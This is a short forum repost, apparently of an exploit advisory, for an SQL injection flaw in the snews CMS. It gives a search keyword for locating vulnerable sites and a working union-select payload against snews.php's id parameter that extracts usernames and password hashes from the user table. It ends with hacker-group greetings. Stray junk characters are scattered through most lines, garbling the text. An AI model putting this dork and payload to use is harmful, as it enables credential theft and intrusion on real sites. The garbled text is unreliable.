标题: CMS snews SQL Injection Vulnerability/ t6 m: E+ g" Q* r2 D
作者: By onestree z4 q s5 M: D" m: u/ R
下载地址 : http://snewscms.com/0 {4 B) O3 J& C: j3 b) _
测试平台 : ubuntu 12.10 / win 74 M1 H9 b+ P9 Q$ a4 j7 s
关键词: inurl:"tanyakan pada rumput yang bergoyang"
/ o9 r& b+ y3 d8 M. d
; ^3 S$ Y2 w" f: Q! d: Q6 j + w- s7 j& D8 N5 q5 J1 f6 y4 T
*************************************************************" b: F* Q7 {+ _/ @
- y/ U/ k( C! F) E
SQL poc:
" T* U6 T, R$ Z5 N( c 6 z. I! L, n% a6 O, ~
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]. A/ W! S7 D5 B% q
! r$ ]0 u( q- ]7 `/ T示例
7 \) J7 I' I' [1 t - G# g. f0 c, G7 e0 ^3 C/ x+ O
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*3 Z$ V( g1 d: \1 f8 [$ q$ Z7 a
/ j& T1 c3 |( A, G1 G
; [4 y2 A' ~3 |' W: {% t致谢:
: \0 X& @& g2 t& N5 [
2 s2 }" a# U8 v( J& B9 V$ _5 e Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
/ E2 T! z3 Z6 m. F0 p) S
* A4 v, _% R( j indonesiancoder - moeslimh4x0r - go-coder
/ Y7 w4 e, W S+ y & P+ }( s/ H0 P2 {
spesial my hunny :*$ x. e) v0 \2 Y5 @- }% I
|
发表于 2013-1-23 08:55:06
收藏
支持
反对